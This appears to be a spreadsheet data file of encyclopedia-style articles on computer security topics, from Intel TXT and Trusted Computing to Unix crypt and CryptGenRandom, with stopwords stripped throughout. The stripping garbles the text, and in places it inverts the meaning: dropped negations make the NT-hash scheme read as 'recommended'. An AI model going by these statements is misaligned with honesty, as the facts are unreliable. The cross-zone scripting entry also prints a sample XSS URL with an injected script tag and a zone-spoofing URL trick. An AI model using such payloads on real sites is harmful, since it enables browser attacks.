(drtm). sinit measures first operating system code module (referred measured launch environment mle). before allowed execute, sinit verifies platform meets requirements launch control policy (lcp) platform owner. consists three parts: verifying sinit version equal newer value specified verifying platform configuration (pconf) valid comparing pcr0–7 known-good values (the platform owner decides pcrs include) verifying valid, comparing measurement list known-good measurements.the integrity lists known-good measurements protected storing hash measurement policy protected non-volatile location modified platform owner. execute trusted once satisfied, sinit allows execute trusted enabling access special security registers enabling locality level access. able make additional measurements dynamic pcrs. dynamic pcrs contain measurement pcr17 drtm launch control policy pcr18 trusted start-up code (mle) pcr19 trusted (for example configuration) pcr20 trusted (for example kernel code) pcr21 defined trusted pcr22 defined trusted osthe technology also provides secure operating system initialize platform. contrast normal processor initialization [which involved boot-strap-processor (bsp) sending start-up inter-processor interrupt (sipi) application processor, thus starting processor "real mode" transitioning "virtual mode" finally "protected mode"], operating system avoids vulnerability performing secure launch (a.k.a. measured launch) puts application processors special sleep state directly started protected mode paging allowed leave state. application values available locally remotely. furthermore, capability digitally sign values (i.e., quote) entity verify measurements come from, protected tpm, thus enabling remote attestation detect tampering, corruption, malicious software. additionally, values used identify execution environment (the particular bios version, level, configuration, etc.) compare lists known-good values categorize platform. this ability evaluate assign trust levels platforms known trusted compute pools. some examples trusted compute pools used: isolation ability control platform connects production network quarantined based trust level failure pass launch control policy. trust based policy restricting critical apps execute platforms meet specified trust level compliance auditing demonstrating critical, personal, sensitive data processed platforms meet trust requirementsnumerous server platforms include intel txt, functionality leveraged software vendors including hytrust, privatecore, citrix, vmware. open-source projects also utilize functionality; example, tboot provides txt-based integrity system linux kernel hypervisor.windows pcr7 binding ability enable disable full device encryption. also intel vpro next-generation secure computing base intel management engine trusted computing notes references external links "trusted execution", technology, intel. "trusted execution", technology (pdf) (overview), intel. "trusted execution", technology (pdf) (architectural overview), intel. intel trusted execution technology software development guide (pdf), intel. "virtualization", technology, intel. intel overview, part linux kernel documentation, december 2014 integrity management using intel txt, lwn.net, april 2009, jake edge attacking intel trusted execution technology, black briefings, february 2009, rafal wojtczuk joanna rutkowska trusted computing technologies, intel trusted execution technology, sandia national laboratories, january 2011, jeremy daniel wendt joseph guise</t>
  </si>
  <si>
    <t>Cross-zone scripting</t>
  </si>
  <si>
    <t>cross-zone scripting browser exploit taking advantage vulnerability within zone-based security solution. attack allows content (scripts) unprivileged zones executed permissions privileged zone i.e. privilege escalation within client (web browser) executing script. vulnerability could browser conditions allows content (scripts) zone executed permissions higher privileged zone. browser configuration error; unsafe sites listed privileged zones. cross-site scripting vulnerability within privileged zonea common attack scenario involves steps. first step cross-zone scripting vulnerability scripts executed within privileged zone. complete attack, perform malicious actions computer using insecure activex components. this type vulnerability exploited silently install various malware (such spyware, remote control software, worms such) onto computers browsing malicious page. origins zone concept there four well known zones internet explorer: internet. default zone. everything belong zones. local intranet. trusted sites. usually used list trusted sites allowed execute minimal security permissions (e.g. unsafe unsigned activex objects). restricted sites.these zones explained detail "how security zones internet explorer".there also additional hidden zone: local computer zone computer zone). this zone particularly interesting access files local computer. historically zone extremely insecure, recent versions internet explorer (for windows steps taken reduce risks associated zone.local intranet, trusted sites local computer usually configured privileged zones. most cross-zone scripting attacks designed jump internet zone privileged zone. examples into local computer zone this type exploit attempts execute code security context local computer zone. following html used illustrate naive (non-working) attempt exploitation: explanation: html code attempts attack.gif loaded cache using reference. then script used attempt executing script local computer zone addressing local file cache. into local intranet zone consider scenario: attacker could (somehow) know cross-site scripting vulnerability http://intranet.example.com/xss.php http://intranet.example.com users regularly visit http://www.example.com/, anyone cool links. attacker adds cool link to:http://intranet.example.com/xss.php?&lt;script&gt;alert()&lt;/script&gt; computer considers intranet.example.com part local intranet zone successfully cross zone scripted. into trusted sites zone well-known example internet explorer discovered following http://windowsupdate.microsoft.com%2f.example.com/ executed "trusted sites" permission windowsupdate.microsoft.com listed trusted site. references external links secunia sa11830 internet explorer security zone bypass address spoofing vulnerability (internet explorer) reported bitlance winter allows cross-zone scripting trusted sites)</t>
  </si>
  <si>
    <t>CrossCrypt</t>
  </si>
  <si>
    <t>crosscrypt open-source on-the-fly encryption program microsoft windows xp/2000 operating systems. crosscrypt allows user make virtual drives encrypt files stored them, making encryption process seamless user. crosscrypt based filedisk, virtual disk driver windows nt/2000/xp uses files emulate physical disks, adding encrypted volumes functionality. features application operates .img file format disk images. format crosscrypt container files fully compatible older linux loop-aes device formats.[1], used windows linux. although created crosscrypt (i.e. crosscryptgui), crosscrypt operates without using command line interface. advantage small size; composed single driver *.sys format command line executable (*.exe) kb). installer. cd/dvd encryption application capable encrypting cd/dvd images (.iso). after burning writing application disk looks blank inserted normal cd/dvd reading device (though, mounted crosscrypt application state change, files accessed virtual drive). encryption algorithms encryption algorithms supported crosscrypt include (256, 192, 128; singlekey mode aes-loop compatible) twofish (160 key; suse linux compatible). also librecrypt, significantly advanced disk encryption program disk encryption disk encryption software comparison disk encryption software references external links official filedisk website crosscryptgui</t>
  </si>
  <si>
    <t>Trusted Computing</t>
  </si>
  <si>
    <t>trusted computing (tc) technology developed promoted trusted computing group. term taken field trusted systems specialized meaning distinct field confidential computing. core idea trusted computing give hardware manufacturers control software system refusing unsigned software. with trusted computing, computer consistently behave expected ways, behaviors enforced computer hardware software. enforcing behavior achieved loading hardware unique encryption inaccessible rest system owner. controversial hardware secured owner, also secured owner. such controversy opponents trusted computing, free software activist richard stallman, refer instead treacherous computing, even point scholarly articles begun place scare quotes around "trusted computing".trusted computing proponents international data corporation, enterprise strategy group endpoint technologies associates claim technology make computers safer, less prone viruses malware, thus reliable end-user perspective. they also claim trusted computing allow computers servers offer improved computer security currently available. opponents often claim technology used primarily enforce digital rights management policies (imposed restrictions owner) increase computer security.: chip manufacturers intel amd, hardware manufacturers dell, operating system providers microsoft include trusted computing products enabled. u.s. army requires every purchases comes trusted platform module (tpm). july 2007, virtually entire united states department defense.in 2019, confidential computing consortium (ccc) established linux foundation mission "improve security data use". consortium members, including microsoft, intel, baidu, hat, meta. concepts trusted computing encompasses technology concepts, required fully trusted system, system compliant specifications: endorsement secure input output memory curtaining protected execution sealed storage remote attestation trusted third party (ttp) endorsement endorsement 2048-bit public private pair created randomly chip manufacture time cannot changed. private never leaves chip, public used attestation encryption sensitive data sent chip, occurs tpm_takeownership command.this used allow execution secure transactions: every trusted platform module (tpm) required able sign random number order allow owner show genuine trusted computer), using particular protocol created trusted computing group (the direct anonymous attestation protocol) order ensure compliance standard prove identity; makes impossible software emulator untrusted endorsement (for example, self-generated one) start secure transaction trusted entity. designed make extraction hardware analysis hard, tamper resistance strong requirement. memory curtaining memory curtaining extends common memory protection techniques provide full isolation sensitive areas memory—for example, locations containing cryptographic keys. even operating system full access curtained memory. exact implementation details vendor specific. sealed storage sealed storage protects private information binding platform configuration information including software hardware used. this means data released particular combination software hardware. sealed storage used enforcing. example, users keep song computer licensed listened able play currently, user locate song, listen send someone else, play software choice, back (and cases, circumvention software decrypt it). alternatively, user software modify operating system's routines leak song data once, say, temporary license acquired. using sealed storage, song securely encrypted using bound trusted platform module unmodified untampered music player computer play architecture, might also prevent people listening song buying computer, upgrading parts current one, except explicit permission vendor song. remote attestation remote attestation allows changes user's computer detected authorized parties. example, software companies identify unauthorized changes software, including users modifying software circumvent commercial digital rights restrictions. works hardware generate certificate stating software currently running. computer present certificate remote party show unaltered software currently executing. numerous remote attestation schemes proposed various computer architectures, including intel, risc-v, arm.remote attestation usually combined public-key encryption information sent read programs requested attestation, eavesdropper. take song example again, user's music player software could send song machines, could attest running authorized copy music player software. combined technologies, provides restricted path music: encrypted prevents user recording transmitted audio subsystem, memory locking prevents dumped regular disk files worked sealed storage curtails unauthorized access saved hard drive, remote attestation prevents unauthorized software accessing song even used computers. preserve privacy attestation responders, direct anonymous attestation proposed solution, uses group signature scheme prevent revealing identity individual signers. proof space (pos) proposed used malware detection, determining whether cache processor empty (e.g., enough space evaluate pospace routine without cache misses) contains routine resisted evicted. trusted third party main obstacles overcome developers technology maintain anonymity still providing “trusted platform”. main object obtaining “trusted mode” party (bob), computer (alice) communicating, trust alice running un-tampered hardware software. this assure alice able malicious software compromise sensitive information computer. unfortunately, order this, alice inform using registered “safe” software hardware, thereby potentially uniquely identifying bob. this might problem wishes identified party, e.g., banking transactions internet. many types communicating activities people enjoy anonymity computer provides. acknowledges this, allegedly developed process attaining anonymity time assuring party communicating "trusted" party. this done developing “trusted third party”. this entity work intermediary user computer user users. essay focus latter process, process referred remote attestation. when user requires (attestation identity key) user wants certified (certification authority). user (trusted platform module) sends three credentials: public credential, platform credential, conformance credential. this certificates cryptographic keys short referred "ek". split main parts, private part "ekpr" public part "ekpub". ekpr never leaves tpm. disclosure ekpub however necessary (version 1.1). ekpub uniquely identify endorser platform, model, kind software currently used platform, details tpm, platform (pc) complies specifications. information communicated directly another party process getting trusted status would time impossible obtain anonymous identity. therefore, information sent privacy certification authority, (trusted third party). when (privacy certification authority) receives ekpub sent tpm, verifies information. information verified create certified secondary pair aik, sends credential back requestor. this intended provide user anonymity. when user certified aik, communicate trusted platforms. version 1.2, developed method obtaining certified aik. this process called direct anonymous attestation. this method require user disclose his/her ekpub ttp. unique feature ability convince remote entity particular (trusted platform module) valid without disclosing ekpub unique identifier. before send certification request remote entity, generate credentials. this done interacting issuer. credentials created sending tpm-unique secret remains within tpm. secret similar analogous when obtained credentials, send verifier. when verifier receives credentials ttp, verify send certified back user. user able communicate trusted parties using certified aik. verifier trusted third party (ttp). verifier determine whether credentials valid, credentials contain unique information discloses platform. example would user wants trusted status sends request issuer. issuer could manufacturer user's platform, e.g. compaq. compaq would check produced valid one, issues credentials. next step, credentials sent user verifier. mentioned might standard ttp, could also different entity. verifier accepts supplied produce certified aik. certified used user communicate trusted platforms. summary version introduces separate entity assist anonymous attestation process. introducing issuer supplies daa, able sufficiently protect user's anonymity towards verifier/ttp. issuer commonly platform manufacturer. without credentials, probably difficult private customer small business organization convince others genuine trusted platform. known applications microsoft products windows vista, windows windows windows make trusted platform module facilitate bitlocker drive encryption. other known applications runtime encryption secure enclaves include signal messenger e-prescription service ("e-rezept") german government. possible applications digital rights management trusted computing would allow companies create digital rights management (drm) system would hard circumvent, though impossible. example downloading music file. sealed storage could used prevent user opening file unauthorized player computer. remote attestation could used authorize play music players enforce record company's rules. music would played curtained memory, would prevent user making unrestricted copy file playing, secure would prevent capturing sent sound system. circumventing system would require either manipulation computer's hardware, capturing analogue (and thus degraded) signal using recording device microphone, breaking security system. business models software (services) internet boosted technology. strengthening system, could base business model renting programs specific time periods "pay models. instance, could download music file could played certain number times becomes unusable, music file could used within certain time period. preventing cheating online games trusted computing could used combat cheating online games. some players modify game copy order gain unfair advantages game; remote attestation, secure memory curtaining could used determine players connected server running unmodified copy software. verification remote computation grid computing trusted computing could used guarantee participants grid computing system returning results computations claim instead forging them. this would allow large scale simulations (say climate simulation) without expensive redundant computations guarantee malicious hosts undermining results achieve conclusion want. criticism trusted computing opponents electronic frontier foundation free software foundation claim trust underlying companies deserved technology puts much power control hands design systems software. they also believe cause consumers lose anonymity online interactions, well mandating technologies trusted computing opponents unnecessary. they suggest trusted computing possible enabler future versions mandatory access control, copy protection, drm. some security experts, alan bruce schneier, spoken trusted computing, believing provide computer manufacturers software authors increased control impose restrictions users able computers. there concerns trusted computing would anti-competitive effect market.there concern amongst critics always possible examine hardware components trusted computing relies, trusted platform module, ultimate hardware system core 'root' trust platform reside. implemented correctly, presents security risk overall platform integrity protected data. specifications, published trusted computing group, open available anyone review. however, final implementations commercial vendors necessarily subjected review process. addition, world cryptography often move quickly, hardware implementations algorithms might create inadvertent obsolescence. trusting networked computers controlling authorities rather individuals create digital imprimaturs. cryptographer ross anderson, university cambridge, great concerns that: support remote censorship [...] general, digital objects created using systems remain control creators, rather control person owns machine happen stored [...] someone writes paper court decides defamatory compelled censor software company wrote word processor could ordered deletion refuses. given possibilities, expect used suppress everything pornography writings criticize political leaders. goes state that: [...] software suppliers make much harder switch competitors' products. simple level, word could encrypt documents using keys microsoft products access would mean could read using microsoft products, competing word processor. [...] [...] important benefit microsoft dramatically increase costs switching away microsoft products (such office) rival products (such openoffice). example, firm wants change office openoffice right merely install software, train staff convert existing files. five years' time, received tc-protected documents perhaps thousand different clients, would permission form signed digital certificates) clients order migrate files platform. firm practice want this, much tightly locked enable microsoft hike prices. anderson summarizes case saying: fundamental issue whoever controls infrastructure acquire huge amount power. having single point control like making everyone bank, accountant, lawyer. there many ways power could abused. digital rights management early motivations behind trusted computing desire media software corporations stricter technology prevent users freely sharing using potentially copyrighted private files without explicit permission. example could downloading music file band: band's record company could come rules band's music used. example, might want user play file three times without paying additional money. also, could remote attestation send music music player enforces rules: sealed storage would prevent user opening file another player enforce restrictions. memory curtaining would prevent user making unrestricted copy file playing, secure output would prevent capturing sent sound system. users unable modify software user wanted switch competing program might find would impossible program read data, information would "locked program. could also make impossible user read modify data except specifically permitted software. remote attestation could cause problems. currently, sites visited using number browsers, though certain websites formatted browsers cannot decipher code. some browsers found around problem emulating browsers. with remote attestation, website could check internet browser used refuse display browser specified (like internet explorer), even emulating browser would work. users unable exercise legal rights many countries allows users certain rights data whose copyright (including text, images, media), often headings fair public interest. depending jurisdiction, cover issues whistleblowing, production evidence court, quoting small-scale usage, backups owned media, making copy owned material personal owned devices systems. steps implicit trusted computing practical effect preventing users exercising legal rights. users vulnerable vendor withdrawal service service requires external validation permission music file game requires connection vendor confirm permission play vulnerable service withdrawn longer updated. number incidents already occurred users, purchased music video media, found ability watch listen suddenly stop vendor policy cessation service, server inaccessibility, times compensation. alternatively cases vendor refuses provide services future leaves purchased material usable present -and increasingly obsolete- hardware long lasts) hardware purchased future. users unable override some opponents trusted computing advocate "owner override": allowing owner confirmed physically present allow computer bypass restrictions secure path. such override would allow remote attestation user's specification, e.g., create certificates internet explorer running, even different browser used. instead preventing software change, remote attestation would indicate software changed without owner's permission. trusted computing group members refused implement owner override. proponents trusted computing believe owner override defeats trust computers since remote attestation forged owner. owner override offers security enforcement benefits machine owner, allow trust computers, owners could waive rules restrictions computers. under scenario, data sent someone else's computer, whether diary, music file, joint project, person controls security, any, computer enforce copy data. this potential undermine applications trusted computing enforce drm, control cheating online games attest remote computations grid computing. loss anonymity because trusted computing equipped computer able uniquely attest identity, possible vendors others possess ability attestation feature zero identity user tc-enabled software high degree certainty. such capability contingent reasonable chance user time provides user-identifying information, whether voluntarily, indirectly, simply inference many seemingly benign pieces data. (e.g. search records, shown simple study search records leak). common information obtained linked user registers computer purchase. another common user provides identifying information website affiliate vendor. while proponents point online purchases credit transactions could potentially secure result remote attestation capability, cause computer user lose expectations anonymity using internet. critics point could chilling effect political free speech, ability journalists anonymous sources, whistle blowing, political blogging areas public needs protection retaliation anonymity. specification offers features suggested implementations meant address anonymity requirement. using third-party privacy certification authority (pca), information identifies computer could held trusted third party. additionally, direct anonymous attestation (daa), introduced v1.2, allows client perform attestation revealing personally identifiable machine information. kind data must supplied order trusted status present entirely clear, admits "attestation important function significant privacy implications". however, clear static dynamic information user computer supplied (ekpubkey) (v1.1b), clear data supplied “verifier” v1.2. static information uniquely identify endorser platform, model, details tpm, platform (pc) complies specifications dynamic information described software running computer. program like windows registered user's name turn uniquely identify user. another dimension privacy infringing capabilities might also introduced technology; often programs might possible information provided ttp. exceptional, however practical situation, user purchases pornographic movie internet, purchaser nowadays, must accept fact provide credit card details provider, thereby possibly risking identified. with technology purchaser might also risk someone finding she) watched pornographic movie 1000 times. this adds dimension possible privacy infringement. extent data supplied ttp/verifiers present exactly known, technology implemented used able assess exact nature volume data transmitted. specification interoperability problems trusted computing requests software hardware vendors follow technical specifications released trusted computing group order allow interoperability different trusted software stacks. however, since least mid-2006, interoperability problems trousers trusted software stack (released open source software ibm) hewlett-packard's stack. another problem technical specifications still changing, unclear standard implementation trusted stack. shutting competing products people voiced concerns trusted computing could used keep discourage users running software created companies outside small industry group. microsoft received great deal press surrounding palladium software architecture, evoking comments "few pieces vaporware evoked higher level fear uncertainty microsoft's palladium", "palladium plot take cyberspace", "palladium keep running software personally approved bill gates". concerns trusted computing used shut competition exist within broader framework consumers concerned using bundling products obscure prices products engage anti-competitive practices. trusted computing seen harmful problematic independent open source software developers. trust widely used public-key cryptography, creation keys done local computer creator complete control access consequentially security policies. proposed encryption-decryption chips, private/public permanently embedded hardware manufactured, hardware manufacturers would opportunity record without leaving evidence with would possible access data encrypted authenticate trivial manufacturer give copy government software manufacturers, platform must steps works authenticated software. therefore, trust anything authenticated encrypted trusted computer, user trust company made chip, company designed chip, companies allowed make software chip, ability interest companies compromise whole process. security breach breaking chain trust happened card manufacturer gemalto, 2010 infiltrated british spies, resulting compromised security cellphone calls.it also critical able trust hardware manufacturers software developers properly implement trusted computing standards. incorrect implementation could hidden users, thus could undermine integrity whole system without users aware flaw. hardware software support since 2004, major manufacturers shipped systems included trusted platform modules, associated bios support. accordance specifications, user must enable trusted platform module used. linux kernel included trusted computing support since version 2.6.13, several projects implement trusted computing linux. january 2005, members gentoo linux's "crypto herd" announced intention providing support tc—in particular support trusted platform module. there also tcg-compliant software stack linux named trousers, released open source license. some limited form trusted computing implemented current versions microsoft windows third-party software. with intel software guard extension (sgx) secure encrypted virtualization (sev) processors, hardware available runtime memory encryption remote attestation features. major cloud providers microsoft azure, google cloud platform virtual machines trusted computing features available. there several open-source projects facilitate confidential computing technology. these include ego, edgelessdb marblerun edgeless systems, well enarx, originates security research hat. intel classmate competitor laptop child) includes trusted platform module. privatecore vcage software used attest servers chips. mobile secure operating system simulates functionality mobile devices using trustzone technology. samsung smartphones come equipped samsung knox depend features like secure boot, tima, mdm, trustzone linux also references external links trusted computing group website</t>
  </si>
  <si>
    <t>Crypt (C)</t>
  </si>
  <si>
    <t>crypt posix library function. typically used compute hash user account passwords. function outputs text string also encodes salt (usually first characters salt rest hashed result), identifies hash algorithm used (defaulting "traditional" explained below). this output string forms password record, usually stored text file. more formally, crypt provides cryptographic derivation functions password validation storage unix systems. relationship unix crypt utility there unrelated crypt utility unix, often confused library function. distinguish two, writers often refer utility program crypt(1), documented section unix manual pages, refer library function crypt(3), documentation manual section details this crypt function used generate hash storage also hash proffered password recorded salt comparison. modern unix implementations crypt library routine support variety hash schemes. particular hash algorithm used identified unique code prefix resulting hashtext, following facto standard called modular crypt format.the crypt() library function also included perl, php, pike, python (although deprecated 3.11), ruby programming languages. derivation functions supported crypt over time various algorithms introduced. enable backward compatibility, scheme started using convention serializing password hashes later called modular crypt format (mcf). crypt(3) hashes generated facto standard vary scheme scheme. well-defined subset modular crypt format created password hashing competition. format defined as:$&lt;id&gt;[$&lt;param&gt;=&lt;value&gt;(,&lt;param&gt;=&lt;value&gt;)*][$&lt;salt&gt;[$&lt;hash&gt;]] identifier representing hashing algorithm (such md5, sha-256 etc.) param name value: hash complexity parameters, like rounds/iterations count salt: base64-like encoded salt hash: base64-like encoded result hashing password saltthe subset covers majority hashes. number extra application-defined methods exist. original implementation using password original implementation crypt() library function third edition unix mimicked m-209 cipher machine. rather encrypting password key, would allowed password recovered encrypted value key, used password key, password database contained result encrypting password key. traditional des-based scheme original password encryption scheme found fast thus subject brute force enumeration likely passwords. seventh edition unix, scheme changed modified form algorithm. goal change make encryption slower. addition, algorithm incorporated 12-bit salt order ensure attacker would forced crack password independently opposed able target entire password database simultaneously. detail, user's password truncated eight characters, coerced 7-bits each; forms 56-bit key. that used encrypt all-bits-zero block, ciphertext encrypted key, total encryptions. 12-bit salt used perturb encryption algorithm, standard implementations can't used implement crypt(). salt final ciphertext encoded printable string form base64. this technically encryption since data (all bits zero) kept secret; widely known advance. however, properties resistant recovery even face known plaintext situations. theoretically possible different passwords could result exactly hash. thus password never "decrypted": merely used compute result, matching results presumed proof passwords "the same." advantages method hashtext stored copied among unix systems without exposing corresponding plaintext password system administrators users. this portability worked years across many generations computing architecture, across many versions unix many vendors. weaknesses traditional scheme traditional des-based crypt algorithm originally chosen resistant recovery even face "known plaintext" attacks, computationally expensive. earliest unix machines took full second compute password hash. this also made reasonably resistant dictionary attacks era. time password hashes commonly stored account file (/etc/passwd) readable anyone system. (this account file also used user numbers names, user names full names, etc.). three decades since time, computers become vastly powerful. moore's generally held true, computer speed capacity available given financial investment doubled times since unix first written. this long since left des-based algorithm vulnerable dictionary attacks, unix unix-like systems linux used "shadow" files long time, migrating password hash values account file (/etc/passwd) file (conventionally named /etc/shadow) read privileged processes. increase computational cost password breaking, unix sites privately started increasing number encryption rounds basis. this side effect making crypt() incompatible standard crypt(): hashes textual form, calculated using different algorithm. some sites also took advantage incompatibility effect, modifying initial block standard all-bits-zero. this increase cost hashing, meant precomputed hash dictionaries based standard crypt() could applied. bsdi extended des-based scheme bsdi used slight modification classic des-based scheme. bsdi extended salt bits made number rounds variable 224-1). chosen number rounds encoded stored password hash, avoiding incompatibility occurred sites modified number rounds used original scheme. these hashes identified starting underscore (_), followed characters representing number rounds characters salt. bsdi algorithm also supports longer passwords, using fold initial long password eight 7-bit bytes supported original algorithm. md5-based scheme poul-henning kamp designed baroque time) computationally expensive algorithm based message digest algorithm. would provide good cryptographic strength password hash, designed quite quick calculate relative strength provides. crypt() scheme designed expensive calculate, slow dictionary attacks. printable form password hashes starts $1$. this scheme allows users length password, characters supported platform (not 7-bit ascii). practice many implementations limit password length, generally support passwords longer person would willing type.) salt also arbitrary string, limited character considerations. first passphrase salt hashed together, yielding message digest. then digest constructed, hashing together passphrase, salt, first digest, rather complex form. then digest passed thousand iterations function rehashes together passphrase salt manner varies rounds. output last rounds resulting passphrase hash. fixed iteration count caused scheme lose computational expense enjoyed variable numbers rounds favoured. june 2012, poul-henning kamp declared algorithm insecure encouraged users migrate stronger password scramblers. blowfish-based scheme niels provos david mazières designed crypt() scheme called bcrypt based blowfish, presented usenix 1999. printable form hashes starts $2$, $2a$, $2b$, $2x$ $2y$ depending variant algorithm used: obsolete. $2a$ current used identify scheme. since major security flaw discovered 2011 non-openbsd crypt_blowfish implementation algorithm, hashes indicated string ambiguous might generated flawed implementation, subsequent fixed, implementation. flaw triggered password strings containing non-ascii (8th-bit-set) characters. $2b$ used recent openbsd implementations include mitigation wraparound problem. previous versions algorithm problem long passwords. design, long passwords truncated characters, byte integer wraparound problem certain password lengths resulting weak hashes. $2x$ flag added crypt_blowfish discovery. hashes renamed $2x$ indicate generated broken algorithm. these hashes still weak, least clear algorithm used generate them. $2y$ flag crypt_blowfish unambiguously new, corrected algorithm. older implementation suffering bug, $2y$ simply work. newer, fixed implementation, produce result using $2b$.blowfish notable among block ciphers expensive setup phase. starts subkeys standard state, uses state perform block encryption using part key, uses result encryption (really, hashing) replace subkeys. then uses modified state encrypt another part key, uses result replace subkeys. proceeds fashion, using progressively modified state hash replace bits state, subkeys set. number rounds keying power two, input algorithm. number encoded textual hash, e.g. $2y$10... hash scheme freebsd implemented support manager hash algorithm provide easier compatibility accounts ms-chap. nt-hash algorithm known weak, uses deprecated hash algorithm without salting. freebsd used prefix this. recommended, easily broken. sha2-based scheme commonly used based scheme become easier attack computer power increased. although blowfish-based system option adding rounds thus remain challenging password algorithm, nist-approved algorithm. light facts, ulrich drepper effort create scheme based sha-2 (sha-256 sha-512) hash functions. printable form hashes starts (for sha-256) (for sha-512) depending variant used. design similar md5-based crypt, notable differences: avoids adding constant data steps. algorithm would repeatedly first letter password; step changed significantly. inspired sun's crypt() implementation, functionality specify number iterations (rounds) main loop algorithm performs added number iterations 5000 default, minimum 1000, maximum 999,999,999.the specification sample code released public domain; often referred "shacrypt". other hashes yescrypt extension scrypt ($7$) finalist. used several linux distributions alternative existing schemes. hash, libcrypt glibc replaced backward-compatible "libxcrypt" project. $argon2d$, $argon2i$, $argon2ds$ these phc-assigned names argon2 algorithm, seem widely used.additional formats, any, described pages implementations. archaic unix schemes bigcrypt modified version des-crypt used hp-ux, digital unix, osf/1. main difference bigcrypt uses characters password, first variable length hash.crypt16 minor modification des, allows passwords characters. used ultrix tru64. support operating systems linux library used almost linux distributions provides implementation crypt function supports des, md5, (since version 2.7) sha-2 based hashing algorithms mentioned above. ulrich drepper, glibc maintainer, rejected bcrypt (scheme support since approved nist. public domain crypt_blowfish library available systems without bcrypt. integrated glibc suse linux. addition, aforementioned libxcrypt used replace glibc crypt() yescrypt-enabled systems. musl library supports schemes plus tradition scheme. traditional code based freesec, modification compatible glibc ufc-crypt. macos darwin's native crypt() provides limited functionality, supporting bsdi. uses systems password hashes, ranging nextstep netinfo newer directory services (ds) system. also derivation function salt (cryptography) references external links source code crypt(3) seventh edition unix (implements proposed des) sample password hash encoding strings .net crypt implementation</t>
  </si>
  <si>
    <t>Crypt (Unix)</t>
  </si>
  <si>
    <t>unix computing, crypt enigma utility program used encryption. ease breaking considered obsolete. program usually used filter, traditionally implemented using "rotor machine" algorithm based enigma machine. considered cryptographically weak provide security brute-force attacks modern, commodity personal computers.some versions unix shipped even weaker version crypt(1) command order comply contemporaneous laws regulations limited exportation cryptographic software. some simply implementations caesar cipher (effectively secure rot13, implemented caesar cipher well-known key). history cryptographer robert morris wrote m-209-based crypt, first appeared version unix, encourage codebreaking experiments; morris managed break crypt hand. dennis ritchie automated decryption method james reeds, enigma-based version appeared version reeds peter weinberger also broke. crypt(1) linux linux distributions generally include unix compatible version crypt command. this largely combination three major factors: crypt relatively obscure rarely used e-mail attachments file format crypt considered cryptographically weak withstand brute-force attacks modern computing systems (linux systems generally ship privacy guard considered reasonably secure modern standards) during early years linux development adoption concern even weak algorithm used crypt was, might still afoul itar's export controls; mainstream distribution developers united states generally excluded leaving customers fetch gnupg strong cryptographic software international sites, sometimes providing packages scripts automate process.the source code several versions crypt command available unix heritage society's unix archive. recent crypt source code available opensolaris project. public domain version available crypt breaker's workbench. enhanced symmetric encryption utilities available linux (and also portable unix-like system) including mcrypt ccrypt. while provide support much sophisticated modern algorithms, used encrypt decrypt files compatible traditional crypt(1) command providing correct command line options. breaking crypt(1) encryption programs breaking crypt(1) encryption widely available. baldwin's public domain crypt breaker's workbench, written 1984-1985, interactive tool provides successive plaintext guesses must corrected user. also provides working crypt(1) implementation used modern distributions.peter selinger's unixcrypt-breaker uses simple statistical model similar dictionary-attack takes plain texts input processes guess plausible plaintexts, require user interaction. relationship password hash function there also unix password hash function name, crypt. though used securing data sense, otherwise essentially unrelated. distinguish two, writers often refer utility program crypt(1), documented section unix manual pages, refer password hash function crypt(3), documentation section manual. also crypt unix library function derivation function references external links source code crypt(1) opensolaris (published clearing export regulations) source code crypt(1) version unix (trivialised one-rotor enigma-style machine) source code crypt(1) version unix (implementation boris hagelin's m-209 cryptographic machine)</t>
  </si>
  <si>
    <t>CryptGenRandom</t>
  </si>
  <si>
    <t>cryptgenrandom deprecated cryptographically secure pseudorandom number generator function included microsoft cryptoapi. win32 programs, microsoft recommends anywhere random number generation needed. 2007 paper hebrew university suggested security problems windows 2000 implementation cryptgenrandom (assuming attacker control machine). microsoft later acknowledged problems exist windows vista. microsoft released windows service pack mid-2008. background win32 includes comprehensive support cryptographic security, including native support (via schannel api) code signing. these capabilities built native windows libraries cryptographic operations, generation. these libraries turn rely cryptographically secure pseudorandom number generator (csprng). cryptgenrandom standard csprng win32 programming environment. method operation microsoft-provided cryptography providers share implementation cryptgenrandom, currently based internal function called rtlgenrandom. only general outline algorithm published 2007: [rtlgenrandom] generates specified fips 186-2 appendix sha-1 function. entropy from: current process (getcurrentprocessid). current thread (getcurrentthreadid). tick count since boot time (gettickcount). current time (getlocaltime). various high-precision performance counters (queryperformancecounter). hash user's environment block, includes username, computer name, search path. [...] high-precision internal counters, rdtsc, rdmsr, rdpmc[omitted: long lists low-level system information fields performance counters] security security cryptosystem's csprng significant origin dynamic material. keys needed fly", session keys protect https sessions bank websites, originate csprngs. pseudorandom numbers predictable, session keys predictable well. because cryptgenrandom facto standard csprng win32 environments, security critical windows users. specifics cryptgenrandom's algorithm officially published. unpublished random number generation algorithm, susceptible theoretical weaknesses including outdated algorithms, reliance entropy gathering several monotonically-increasing counters might estimated controlled extent attacker local access system. cryptanalysis cryptanalysis cryptgenrandom, published november 2007 dorrendorf others hebrew university jerusalem university haifa, found significant weaknesses windows 2000 implementation algorithm.to take advantage vulnerability, attacker would first need compromise program running random number generator. weaknesses paper depend attacker siphoning state bits generator. attacker position carry attack would typically already position defeat random number generator (for instance, simply sniff outputs generator, memory known values). however, hebrew university team notes attacker need steal state bits order persistently violate security cryptgenrandom instance. they also information glean determine past random numbers generated, potentially compromising information, credit card numbers, already sent. paper's attacks based fact cryptgenrandom uses stream cipher rc4, backwards state known. they also take advantage fact cryptgenrandom runs user mode, allowing anyone gains access operating system user level, example exploiting buffer overflow, cryptgenrandom's state information process. finally, cryptgenrandom refreshes seed entropy infrequently. this problem aggravated fact win32 process instance cryptgenrandom state; means compromise process transitively compromise every process, also increase longevity successful break. because details cryptgenrandom algorithm public, dorrendorf's team used reverse engineering tools discern algorithm works. their paper first published record windows cryptographic random number generator operates. common criteria windows 2000, 2003 successfully undergone eal4+ evaluations, including cryptgenrandom() fipsgenrandom() implementations. security target documentation available common criteria portal, indicates compliance eal4 requirements. conclusions drawn security algorithm result; eal4 measures products best practices stated security objectives, rarely involves in-depth cryptanalysis. fips validation microsoft obtained validation implementations following environments: windows vista implementations (certificate 321) windows 2003 enhanced cryptographic provider (rsaenh.dll) (certificate 316) windows 2003 enhanced diffie-hellman cryptographic provider (dssenh.dll) (certificate 314) windows 2003 kernel mode cryptographic module (fips.sys) (certificate 313) windows windows mobile enhanced cryptographic provider (rsaenh.dll) (certificate 292) windows windows mobile enhanced cryptographic provider (rsaenh.dll) (certificate 286) windows enhanced cryptographic provider (rsaenh.dll) (certificate 66)these tests "designed test conformance various approved specifications rather provide measure product’s security. [...] thus, validation interpreted evaluation endorsement overall product security." conclusions drawn security algorithm 